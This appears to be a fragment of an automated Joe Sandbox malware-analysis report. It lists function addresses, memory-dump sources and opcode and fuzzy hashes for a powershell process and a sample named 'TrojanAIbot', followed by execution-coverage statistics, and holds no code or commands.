                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1614f48f3e8b133d96effbdb3b51f6d73dab50a8693ed89a129f631805192af8
                                                                                                                • Instruction ID: 2621bbcd9fff45635b3a978c2b22b5869bbe3ab545876457f94ccf3752fd9d48
                                                                                                                • Opcode Fuzzy Hash: 1614f48f3e8b133d96effbdb3b51f6d73dab50a8693ed89a129f631805192af8
                                                                                                                • Instruction Fuzzy Hash: CBF04976200610AF9320CF0AC984C23FBADEFD4730719C15AF84A4B611C631FC41CAA0
                                                                                                                Function 040E90D8 Relevance: .0, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0999b5939ffde03ba2de8867eb55e0bad1747abb5797b048231bdfc75d759063
                                                                                                                • Instruction ID: 243e02d82070702e36e181a9cf31899c2f7ee32aa24ba3cba4fa7ed819f3593f
                                                                                                                • Opcode Fuzzy Hash: 0999b5939ffde03ba2de8867eb55e0bad1747abb5797b048231bdfc75d759063
                                                                                                                • Instruction Fuzzy Hash: 78F0F0F16002099BE7106F69C0487EBBBA5EBC131CF208029CD1917380DF393802CB90
                                                                                                                Function 0402D998 Relevance: .0, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e89d9bea23105014653df10d7db2f4c98651247ee2d13620018f3b7a5073ea80
                                                                                                                • Instruction ID: bb158fda25351b277b7bd7ba3d786b4bc8746259099da74f69eadfdb6f132efc
                                                                                                                • Opcode Fuzzy Hash: e89d9bea23105014653df10d7db2f4c98651247ee2d13620018f3b7a5073ea80
                                                                                                                • Instruction Fuzzy Hash: 22F04975100A90AFD321CF06CD84D23BBB9EF85624B198489B84A5B352C630FC42CBA0
                                                                                                                Function 040EDE38 Relevance: .0, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ccc8376ff21662190d47153d6fdcb21e4bd086f1f2466d1f5903b22d188a8cda
                                                                                                                • Instruction ID: 5f23de9d8e33fd154dccd2aee48a3f6daa1f0291c0680f8aae1b811fa3ceca8e
                                                                                                                • Opcode Fuzzy Hash: ccc8376ff21662190d47153d6fdcb21e4bd086f1f2466d1f5903b22d188a8cda
                                                                                                                • Instruction Fuzzy Hash: 42F05E353081418FC3119F2DD854876BBF5EFCA71571900DAE184DB372DA61DC11CB91
                                                                                                                Function 040E7968 Relevance: .0, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 74e678e5afd1a7ad11a673464119662bfeca998428599c2a3e4a92d18d731c4a
                                                                                                                • Instruction ID: 725606434f125da20107506ac20426bedd31100c4a8777c8ba5489d2f243e186
                                                                                                                • Opcode Fuzzy Hash: 74e678e5afd1a7ad11a673464119662bfeca998428599c2a3e4a92d18d731c4a
                                                                                                                • Instruction Fuzzy Hash: 35F0A7317007159FD7109AAAEC4497FB7E9EB88275B00092DE609D3740DF34AC4187B4
                                                                                                                Function 040E7697 Relevance: .0, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67156bcdbc682505fae3d4379589ab8e659e6810ed76e09655c68d09889a84de
                                                                                                                • Instruction ID: fbe71e87cb2f7f11a002b33296c7a886aa5946e82faca4c22d06644be8d2556b
                                                                                                                • Opcode Fuzzy Hash: 67156bcdbc682505fae3d4379589ab8e659e6810ed76e09655c68d09889a84de
                                                                                                                • Instruction Fuzzy Hash: 5AF0E579300114CFCB00DB7ED800AAAB7E6FBC83587154194EA09EB365DB34EC128B90
                                                                                                                Function 040E90E8 Relevance: .0, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 19251ddd9733e19c5647808942e35217a16ec68e5db4e8ff9afc6ab0bd40f866
                                                                                                                • Instruction ID: baf0b0bf4c051d68fe3208cdb2d2f566cc1840da3865ce5b5939af1e788b0311
                                                                                                                • Opcode Fuzzy Hash: 19251ddd9733e19c5647808942e35217a16ec68e5db4e8ff9afc6ab0bd40f866
                                                                                                                • Instruction Fuzzy Hash: 61F0ECB16005085BE350BBA9C0197EB77AADBC532CF24816AC91A57384CE3E3802CBE0
                                                                                                                Function 040EDE48 Relevance: .0, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3b4e947771173f656943d42229f50498beadb838784381a924829e485b57aba
                                                                                                                • Instruction ID: b3a67852313f2035e7b2757e5e672be90e35db656c677109de540a41e0d7dd7e
                                                                                                                • Opcode Fuzzy Hash: e3b4e947771173f656943d42229f50498beadb838784381a924829e485b57aba
                                                                                                                • Instruction Fuzzy Hash: C4E0E5793001118F8714AB1ED498C6AB7FAEFCE76571900AAE549DB731DA61EC11CB90
                                                                                                                Function 040E8969 Relevance: .0, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3a19521352028ea8dd4c24ba2c93fa732ddeabe1fc878e29cbc9cced87b2a949
                                                                                                                • Instruction ID: cbddc1aa990fc2895ac30b92d816dd1b0d131e5d82f2a3a15b41e7628f22a3ad
                                                                                                                • Opcode Fuzzy Hash: 3a19521352028ea8dd4c24ba2c93fa732ddeabe1fc878e29cbc9cced87b2a949
                                                                                                                • Instruction Fuzzy Hash: 3AF0A0B130C3A15BCB0B2775A8583ED7FA5AF86328F040097D60587282CF7C6D0587E5
                                                                                                                Function 040E9158 Relevance: .0, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1c9b932418d846ca6cc2c1f667033b6f51f3b72616f3ca78d66f09e7402e9114
                                                                                                                • Instruction ID: a882536e0a6a3528eb55237bdc80d66e0fe2f8ce4b62edb9694bb64d3653d8f1
                                                                                                                • Opcode Fuzzy Hash: 1c9b932418d846ca6cc2c1f667033b6f51f3b72616f3ca78d66f09e7402e9114
                                                                                                                • Instruction Fuzzy Hash: 72F08CB09053019FD3609F79D8D939ABBE5FB40310F000869D64ED7380DB397880CB80
                                                                                                                Function 040E9168 Relevance: .0, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fa9e2ae35b8a411c20640169288f85d2be5a62ad7c4b4c21c73753df61623096
                                                                                                                • Instruction ID: fb983dc4f8cc5377351ea9383fb41b0ff829a81c5a89cc1af43878cc7654eae8
                                                                                                                • Opcode Fuzzy Hash: fa9e2ae35b8a411c20640169288f85d2be5a62ad7c4b4c21c73753df61623096
                                                                                                                • Instruction Fuzzy Hash: 6CF06D709003048FD3609FB9D8DD79A7BE9FB44350F004469D50ED3380DB3978808B90
                                                                                                                Function 040E9549 Relevance: .0, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce460bc1992ddfde0838e933cda24f874bab0b850ef39adfe2c707096be86e0e
                                                                                                                • Instruction ID: 2ff92d3bdc4768f8a797efa4c03e85e22219199995ea12b00ce1f498f1d84534
                                                                                                                • Opcode Fuzzy Hash: ce460bc1992ddfde0838e933cda24f874bab0b850ef39adfe2c707096be86e0e
                                                                                                                • Instruction Fuzzy Hash: 16E0C2A3B011621FD79875FB19006FB4BCB8BC209DB08403A8908E7342ED50DC2283E1
                                                                                                                Function 040E8978 Relevance: .0, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7c237832e56d43303e5d606d785c4c73bd28ee182e400073bbb18fa1fe5c3ae6
                                                                                                                • Instruction ID: d68d1b3279bdd6461c03b34ff8352f488474df38d85b3795a43d7ad5bfbb68f9
                                                                                                                • Opcode Fuzzy Hash: 7c237832e56d43303e5d606d785c4c73bd28ee182e400073bbb18fa1fe5c3ae6
                                                                                                                • Instruction Fuzzy Hash: B7E0DF7130866047CB09277AA84C3AE7B9AEBC4728F00002AD60683380CF7C6C0283D9
                                                                                                                Function 040E9550 Relevance: .0, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 735c997e64e624a9a5bedafe36986ebfa274c2dcc1dbdf94377c4121129a0cd4
                                                                                                                • Instruction ID: 40b33907c3cbf4524bb9815274372883de41973097452b0f45c1530bbfbfd954
                                                                                                                • Opcode Fuzzy Hash: 735c997e64e624a9a5bedafe36986ebfa274c2dcc1dbdf94377c4121129a0cd4
                                                                                                                • Instruction Fuzzy Hash: ACD05EE3B011252F56E875FB19006FB96CF8BC54AC709403E9A09E3342EC40EC2243E1
                                                                                                                Function 040EDCE8 Relevance: .0, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                • Instruction ID: 2915151d93607d391ee54944f6ad07e31e4fe463a925fd3772877a6b847c8a21
                                                                                                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                • Instruction Fuzzy Hash: 16E08631B140149B8B089A5AD4144FDF7AADFCC220F04807AD90AA7340DA32691586E1
                                                                                                                Function 040EAF88 Relevance: .0, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ef7bf1647bd34a1547bb1d13527bedc38314e8cb574cb21b9002ef49ff4d17f6
                                                                                                                • Instruction ID: 69a29e9b09c164c4db02993e7d1290b3616c736c75df244181f37fb989b4c500
                                                                                                                • Opcode Fuzzy Hash: ef7bf1647bd34a1547bb1d13527bedc38314e8cb574cb21b9002ef49ff4d17f6
                                                                                                                • Instruction Fuzzy Hash: E2D02B763043571BC7189A5FB410266BBDBDFCD215B188035E104D7300EE31881247D0
                                                                                                                Function 040EF458 Relevance: .0, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 324ece813d80d5ede90c657f6b423a962be0bc9ed584499338869696165dfaea
                                                                                                                • Instruction ID: 65ea8342ef88a56f0629743dd01a31b6495cae59ff7278876658fbbaa87d0d48
                                                                                                                • Opcode Fuzzy Hash: 324ece813d80d5ede90c657f6b423a962be0bc9ed584499338869696165dfaea
                                                                                                                • Instruction Fuzzy Hash: 9DE01270D052496FC740EF79984156AFFF4EB49200B2485AED959D7201E6319612DBD2
                                                                                                                Function 040E8800 Relevance: .0, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cb6740e3113e3de31a0fd3fa8949d3e1a33b1fc3cd8427773eddc3d7f719b066
                                                                                                                • Instruction ID: 8b7713f5640653c320014c299e876924c9b0e7ee65ac8fd50d433598be7459d3
                                                                                                                • Opcode Fuzzy Hash: cb6740e3113e3de31a0fd3fa8949d3e1a33b1fc3cd8427773eddc3d7f719b066
                                                                                                                • Instruction Fuzzy Hash: E1E08675E0820A9FC714EF65E4878ADBFB1F704304B004025E90597380EF309C91CBC1
                                                                                                                Function 040E8739 Relevance: .0, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2a8d81608f69a4c6771ae48b2f4fcecc8ed9e7d166fcd1d9b9e6cc69f192b5cb
                                                                                                                • Instruction ID: 2e6b35a407574898fd983c6c2a160a7290a9aebbad5dee9a70fce37551b67353
                                                                                                                • Opcode Fuzzy Hash: 2a8d81608f69a4c6771ae48b2f4fcecc8ed9e7d166fcd1d9b9e6cc69f192b5cb
                                                                                                                • Instruction Fuzzy Hash: 70E086B180420ADBCB08AF66E4CA5BDBF74FF10311B000459D54653280EB316657CFC1
                                                                                                                Function 040EF468 Relevance: .0, Instructions: 16COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                • Instruction ID: 0f072cfa9f146d0a77f480ea2b8c604efac062786508809714570b9ef6aae59c
                                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                • Instruction Fuzzy Hash: 91D067B0D0420DAF8780EFADD94156EFBF4EB48200F6085AA8919E7301F7329A128BD1
                                                                                                                Function 040E8748 Relevance: .0, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 743071a6f2b447d31ceb75764903612fa517c2a4627e3e2bc8eb7bb3573c8f14
                                                                                                                • Instruction ID: e2a628b9d6b101702d710028fe45ad0ef2c7df77f8d9b4f74c9cfdb3e0ed366f
                                                                                                                • Opcode Fuzzy Hash: 743071a6f2b447d31ceb75764903612fa517c2a4627e3e2bc8eb7bb3573c8f14
                                                                                                                • Instruction Fuzzy Hash: 76D017318081098BCB08ABA6E89B9BDBB34FA10312F404169D90762190EA356A5ACAC1
                                                                                                                Function 040E7EA0 Relevance: .0, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a91b8a300b7be6bdee89e8b33f9d09bf0b2c3bfddec336554795a22b4c8a80f4
                                                                                                                • Instruction ID: ce14d1bd30f6c4d448fbc2c16cd4df8e4f6a04e891d5d1f34411bd8e6f131f15
                                                                                                                • Opcode Fuzzy Hash: a91b8a300b7be6bdee89e8b33f9d09bf0b2c3bfddec336554795a22b4c8a80f4
                                                                                                                • Instruction Fuzzy Hash: 58C08C22E6E3811FFF43B2322C211C23FB284532A030A02D3D800C6027DC1D8901C291
                                                                                                                Function 040E8810 Relevance: .0, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 526adf506b99ac8b68682ea2b461c16b69f2c7bbe939da9b8076d709f18cadce
                                                                                                                • Instruction ID: d4aa4e7c90bdb4e707a2c79a6209b53eee3a83b89ddde4b2e8875915d66e0dcc
                                                                                                                • Opcode Fuzzy Hash: 526adf506b99ac8b68682ea2b461c16b69f2c7bbe939da9b8076d709f18cadce
                                                                                                                • Instruction Fuzzy Hash: 18D01234E0820A8FC714EF65D44696DBBB5E744300F004155D90993380EA305C51CBC1
                                                                                                                Function 040E7932 Relevance: .0, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c9ec1856c11bf62cb8ee229abe401eb97b0aac2f10806d1b90fee9305a52cd22
                                                                                                                • Instruction ID: c95918c6daac60e7a040659e46a3c371e692d4fefdbefd6436f1512e9d67102a
                                                                                                                • Opcode Fuzzy Hash: c9ec1856c11bf62cb8ee229abe401eb97b0aac2f10806d1b90fee9305a52cd22
                                                                                                                • Instruction Fuzzy Hash: 85D0223610E3C28FE7025BB1BC140D03F22DE9329434500EFE00ACB2E3D92A8948CB11
                                                                                                                Function 040E7940 Relevance: .0, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 46cc286577009d7a151361e3fb10ec2700c36419271794325549083d02cc0912
                                                                                                                • Instruction ID: ca243e294fd25ebb645ff8377a00ad1015e18c1e094aebc772188e98833a6782
                                                                                                                • Opcode Fuzzy Hash: 46cc286577009d7a151361e3fb10ec2700c36419271794325549083d02cc0912
                                                                                                                • Instruction Fuzzy Hash: 29B092300457498FC3486F75AC088197329AB4021578004A8E80E0A6928E3AE888CE54

                                                                                                                Executed Functions

                                                                                                                Function 02C70847 Relevance: .6, Instructions: 601COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.2273072787.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_15_2_2c70000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b9252d6eaa61c795cf62771c0832dfe3ccd28b75bb8e4522ac868f630a394273
                                                                                                                • Instruction ID: 755fbcb99a94e63da678c2b49bd79e8a18c365235d9a309765ea8b09c9238af2
                                                                                                                • Opcode Fuzzy Hash: b9252d6eaa61c795cf62771c0832dfe3ccd28b75bb8e4522ac868f630a394273
                                                                                                                • Instruction Fuzzy Hash: 1F62AC70E01269CFDB68DF24D894B9DBBB2FF88301F1185A9D449A7255EB31AE85CF40
                                                                                                                Function 02C70848 Relevance: .6, Instructions: 601COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.2273072787.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_15_2_2c70000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7b2f01fba92bde1f254ba328fbd32f9decf67e192d8495962ce6c0cb5817862c
                                                                                                                • Instruction ID: 9f6503f0d13fc186a2e1d368463150acc9531c3b6015c09eaf6467225c953810
                                                                                                                • Opcode Fuzzy Hash: 7b2f01fba92bde1f254ba328fbd32f9decf67e192d8495962ce6c0cb5817862c
                                                                                                                • Instruction Fuzzy Hash: 2C62AC70E01269CFDB68DF24D894B9DBBB2FF88301F1185A9D449A7254EB31AE85CF40
                                                                                                                Function 02C75228 Relevance: .0, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.2273072787.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_15_2_2c70000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c4eb3d8aa2c958b52a01fe159f193984f3b226542a099a90760f44feed57bcbf
                                                                                                                • Instruction ID: d8372e4d3142af254a40d7ab19026b53ad72c7a8a2ba8b85dd910e2351c0c75c
                                                                                                                • Opcode Fuzzy Hash: c4eb3d8aa2c958b52a01fe159f193984f3b226542a099a90760f44feed57bcbf
                                                                                                                • Instruction Fuzzy Hash: 94118C70C11219DFDB24EFB4D0493AEBBF0EB45306F1199AAC415A3290DB780688CF51
                                                                                                                Function 02C75238 Relevance: .0, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.2273072787.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_15_2_2c70000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 148930196ba43f278864cc506475ab79137ec404f217d56457d1938c4a3b4bad
                                                                                                                • Instruction ID: 7c37be896c29751a4908ac0184a1f5a179ce05a2ddceb4f1a0ec5c84a9bd4c89
                                                                                                                • Opcode Fuzzy Hash: 148930196ba43f278864cc506475ab79137ec404f217d56457d1938c4a3b4bad
                                                                                                                • Instruction Fuzzy Hash: 1E017874C11219DFCB18EFB4C0493AEBBF0EB45306F1098AA8815A3290DB780788CF91

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10.1%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:328
                                                                                                                Total number of Limit Nodes:36
